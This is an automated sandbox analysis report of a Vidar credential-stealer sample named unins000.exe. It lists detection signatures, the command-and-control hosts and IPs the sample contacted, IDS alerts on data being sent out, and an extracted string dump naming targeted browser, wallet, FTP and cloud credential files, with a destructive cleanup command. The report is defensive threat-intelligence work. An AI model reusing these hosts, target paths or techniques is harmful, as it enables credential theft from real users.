Windows Analysis Report
unins000.exe

Overview

General Information

Sample name: unins000.exe
Analysis ID: 1597057
MD5: e94affb98148fc4e0cfb9a486bb37160
SHA1: 3cf9cbca48ed9e36a0ccd17cf97f6e4b96c14a24
SHA256: bcbdb74f97092dfd68e7ec1d6770b6d1e1aae091f43bcebb0b7bce6c8188e310
Tags: exevidaruser-msz
Infos:

Detection

Vidar
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Vidar stealer
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Monitors registry run keys for changes
Searches for specific processes (likely to inject)
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (date check)
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains executable resources (Code or Archives)
PE file contains more sections than normal
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Stores files to the Windows start menu directory
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection

barindex
Source: https://tlfiyat.shop/5 Avira URL Cloud: Label: malware
Source: https://tlfiyat.shop/ Avira URL Cloud: Label: malware
Source: 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199819539662", "Botnet": "go2dniz"}
Source: Submited Sample Integrated Neural Analysis Model: Matched 99.9% probability
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00405FE7 CryptUnprotectData,LocalAlloc,LocalFree, 3_2_00405FE7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040E7E9 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,GetLastError,GetProcessHeap,HeapFree, 3_2_0040E7E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406062 BCryptCloseAlgorithmProvider,BCryptDestroyKey, 3_2_00406062
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040627F LocalAlloc,BCryptDecrypt, 3_2_0040627F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040609C BCryptOpenAlgorithmProvider,BCryptSetProperty,BCryptGenerateSymmetricKey, 3_2_0040609C
Source: unins000.exe Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: unknown HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.120.106:443 -> 192.168.2.5:49851 version: TLS 1.2
Source: unins000.exe Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
Source: Binary string: vdr1.pdb source: unins000.exe, 00000000.00000002.2404445235.0000000003B9F000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, MSBuild.exe, MSBuild.exe, 00000003.00000002.2900653647.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Source: Binary string: A{"id":1,"method":"Storage.getCookies"}|.tgz.gzSecurityHistoryWork Dir: In memorySOFTWARE\Microsoft\Cryptographyfirefox%08lX%04lX%lu_key.txtSoft\Steam\steam_tokens.txt\Discord\tokens.txtpasswords.txtinformation.txtlocalhostWebSocketClient" & exitGdipGetImageHeightSoftGdipGetImagePixelFormatN0ZWFt\Monero\wallet.keysAzure\.awsstatusWallets_CreateProcessGdipGetImageEncodershttpsSoftware\Martin Prikryl\WinSCP 2\SessionsPlugins/devtoolsprefs.jsLocal Extension SettingsSync Extension SettingsFilescookiesCookies\BraveWallet\Preferenceskey_datas%s\%s\%sPortNumberCurrentBuildNumberGdiplusStartup.zipGdipCreateHBITMAPFromBitmapOpera Crypto.zooUnknownGdiplusShutdown/json_logins.jsoninvalid string positionSoftware\Martin Prikryl\WinSCP 2\ConfigurationDisplayVersionSOFTWARE\Microsoft\Windows NT\CurrentVersionopentokenamcommunity.comTelegramSoftware\Valve\SteamGdipSaveImageToStreamGdipLoadImageFromStream\AppData\Roaming\FileZilla\recentservers.xml.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstallapprove_aprilNetworkblock.arjprofiles.ini.lzhGdipGetImageWidthwallet_pathSteamPathscreenshot.jpgstring too longvector<T> too longProcessorNameStringloginusers.vdflibraryfolders.vdfconfig.vdfDialogConfig.vdfDialogConfigOverlay*.vdfGdipGetImageEncodersSizesteam.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\system32\cmd.exeC:\Windows\system32\rundll32.exeBravetrueformhistory.sqlitecookies.sqliteplaces.sqliteLocal StatefalseAzure\.azureSOFTWARE\monero-project\monero-corechromefile_nameDisplayNameHostNameProductNameUserNameGdipSaveImageToFilemsal.cacheGdipDisposeImagemodeAzure\.IdentityServiceUseMasterPasswordhwidMachineGuidtask_idbuild_idCrash DetectedDisabled%dx%d%d/%d/%d %d:%d:%d.arcvdr1.pdb\Local Storage\leveldb_0.indexeddb.leveldb_formhistory.db_history.db_cookies.db_passwords.db_webdata.db_key4.db\key4.dbfile_dataLogin DataWeb DataoperaOperachrome-extension_[Processes][Software]\storage\default\\.aws\errors\\Telegram Desktop\\Steam\\config\\.azure\ Stable\\.IdentityService\\discord\/c timeout /t 10 & rd /s /q "C:\ProgramData\" & rd /s /q "C:\ProgramData\\..\.ZDISPLAYOpera GXEXCEPTION_INT_OVERFLOWEXCEPTION_FLT_OVERFLOWEXCEPTION_STACK_OVERFLOWEXCEPTION_FLT_UNDERFLOWPOSTEXCEPTION_BREAKPOINT\Local Storage\leveldb\CURRENTEXCEPTION_DATATYPE_MISALIGNMENTEXCEPTION_FLT_INEXACT_RESULTGETEXCEPTION_IN_PAGE_ERRORdQw4w9WgXcQEXCEPTION_SINGLE_STEPGdipCreateBitmapFromHBITMAPEXCEPTION_INT_DIVIDE_BY_ZEROEXCEPTION_FLT_DIVIDE_BY_ZEROEXCEPTION_NONCONTINUABLE_EXCEPTIONUNKNOWN EXCEPTIONEXCEPTION_INVALID_DISPOSITIONEXCEPTION_PRIV_INSTRUCTIONEXCEPTION_ILLEGAL_INSTRUCTIONEXCEPTION_FLT_INVALID_OPERATIONEXCEPTION_ACCESS_VIOLATIONEXCEPTION_FLT_STACK_CHECKEXCEPTION_FLT_DENORMAL_OPERANDEXCEPTION_ARRAY_BOUNDS_EXCEEDED%d MBIndexedDBOCALAPPDATA?<Host><Port><User><Pass encoding="base64">http://localhost:"webSocketDebuggerUrl":6^userContextId=4294967295465 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73ws://localhost:9223.metadata-v2:22.ps15121Windows 11HTTP/1.1HARDWA
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: unins000.exe, 00000000.00000002.2427363396.0000000004A57000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2438196636.0000000007040000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: unins000.exe, 00000000.00000002.2427363396.0000000004A57000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2427363396.0000000004ACF000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2438196636.0000000007040000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdbSHA256}Lq source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: protobuf-net.pdb source: unins000.exe, 00000000.00000002.2427363396.0000000004A08000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000003.2395583377.0000000004C4D000.00000004.00000800.00020000.00000000.sdmp, unins000.exe, 00000000.00000002.2437028646.0000000006F60000.00000004.08000000.00040000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00413C71 SHGetFolderPathA,wsprintfA,FindFirstFileA,FindNextFileA,strcpy,_splitpath,strcpy,strlen,isupper,wsprintfA,strcpy,strlen,SHFileOperationA,FindNextFileA,FindNextFileA,FindClose, 3_2_00413C71
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004112E8 wsprintfA,FindFirstFileA,memset,memset,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,memset,lstrcatA,strtok_s,SymMatchString,strtok_s,memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 3_2_004112E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00407891 FindFirstFileA,CopyFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,FindNextFileA,FindClose, 3_2_00407891
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0040A69C FindFirstFileA,StrCmpCA,CopyFileA,Sleep,DeleteFileA,FindNextFileA,FindClose, 3_2_0040A69C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408776 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA, 3_2_00408776
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411D33 wsprintfA,FindFirstFileA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00411D33
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_004013DA FindFirstFileA,FindNextFileA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindNextFileA,FindClose, 3_2_004013DA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00406784 ExpandEnvironmentStringsA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,StrCmpCA,CopyFileA,CopyFileA,Sleep,StrCmpCA,StrCmpCA,CopyFileA,CopyFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,memset,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose, 3_2_00406784
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00412BBE wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00412BBE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00409C78 wsprintfA,FindFirstFileA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 3_2_00409C78
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00408224 FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 3_2_00408224
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_0041269A GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrcatA,lstrlenA,lstrlenA, 3_2_0041269A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00411883 SymMatchString,SymMatchString,SymMatchString,GetLogicalDriveStringsA,memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA, 3_2_00411883
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 06FB0AA0h 0_2_06FB06A8
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 06FB0AA0h 0_2_06FB06A2
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 06FB104Ch 0_2_06FB0E38
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 06FB104Ch 0_2_06FB0E32
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 07023E38h 0_2_07023D79
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then jmp 07023E38h 0_2_07023D80
Source: C:\Users\user\Desktop\unins000.exe Code function: 4x nop then mov dword ptr [ebp-20h], 00000000h 0_2_0703D3C0
Source: chrome.exe Memory has grown: Private usage: 1MB later: 38MB

Networking

barindex
Source: Network traffic Suricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M1 : 192.168.2.5:49870 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49907 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50009 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49901 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 88.99.120.106:443 -> 192.168.2.5:49890
Source: Network traffic Suricata IDS: 2859378 - Severity 1 - ETPRO MALWARE Win32/Stealc/Vidar Stealer Host Details Exfil (POST) M2 : 192.168.2.5:49862 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 88.99.120.106:443 -> 192.168.2.5:49879
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49972 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49986 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49986 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50000 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50000 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50044 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50052 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50052 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50053 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50053 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50057 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50057 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50051 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50051 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:49992 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:49992 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50055 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50055 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50054 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2859636 - Severity 1 - ETPRO MALWARE Vidar/StealC CnC Exfil via SQL Database (POST) : 192.168.2.5:50054 -> 88.99.120.106:443
Source: Network traffic Suricata IDS: 2059331 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST M2 : 192.168.2.5:50063 -> 88.99.120.106:443
Source: Malware configuration extractor URLs: https://steamcommunity.com/profiles/76561199819539662
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 149.154.167.99 149.154.167.99
Source: Joe Sandbox View IP Address: 2.23.209.59 2.23.209.59
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown TCP traffic detected without corresponding DNS query: 192.229.211.108
Source: unknown TCP traffic detected without corresponding DNS query: 172.64.149.23
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe Code function: 3_2_00403C79 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle, 3_2_00403C79
Source: global traffic HTTP traffic detected: GET /sc1phell HTTP/1.1Host: t.meConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:136.0) Gecko/20100101 Firefox/136.0Host: tlfiyat.shopConnection: Keep-AliveCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&oft=1&pgcl=20&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_ogb?hl=en-US&async=fixed:0 HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIe2yQEIprbJAQipncoBCMDdygEIlaHLAQiFoM0BCNy9zQEI2sPNAQjpxc0BCI/KzQEIucrNAQi/0c0BCIrTzQEI0NbNAQio2M0BCPnA1BUYj87NARi60s0BGMLYzQEY642lFw==Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /async/newtab_promos HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global traffic HTTP traffic detected: GET /edge/ntp?locale=en-GB&title=New%20tab&dsp=1&sp=Bing&isFREModalBackground=1&startpage=1&PC=U531 HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"sec-ch-ua-platform-version: "10.0.0"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-GB,en;q=0.9,en-US;q=0.8
Source: global traffic HTTP traffic detected: GET /bundles/v1/edgeChromium/latest/SSR-extension.bb64361f77a4185b4ba3.js HTTP/1.1Host: ntp.msn.comConnection: keep-alivesec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://ntp.msn.comsec-ch-viewport-height: 874sec-ch-ua-arch: "x86"sec-ch-viewport-width: 1232sec-ch-ua-platform-version: "10.0.0"downlink: 1.4sec-ch-ua-full-version-list: "Microsoft Edge";v="117.0.2045.47", "Not;A=Brand";v="8.0.0.0", "Chromium";v="117.0.5938.132"sec-ch-ua-bitness: "64"sec-ch-ua-model: ""sec-ch-prefers-color-scheme: lightsec-ch-ua-platform: "Windows"device-memory: 8rtt: 100sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47sec-ch-ua-full-version: "117.0.2045.47"sec-ch-dpr: 1ect: 4gAccept: */*sec-edge-ntp: {"back_block":0,"bg_cur":{},"bg_img_typ":"bing","exp":["msQuickLinksDefaultOneRow","msShoppingWebAssistOnNtp","msShoppingHistogramsOnNtp","msEnableWinHPNewTabBackButtonFocusAndClose","msCustomMaxQuickLinks","msMaxQuickLinksAt20","msAllowThemeInstallationFromChromeStore","msEdgeSplitWindowPrivateTarget","msEdgeSplitWindowLinkMode"],"feed":0,"feed_dis":"onscroll","layout":1,"quick_links_opt":1,"sel_feed_piv":"","show_greet":true,"vt_opened":false}Sec-Fetch-Site: 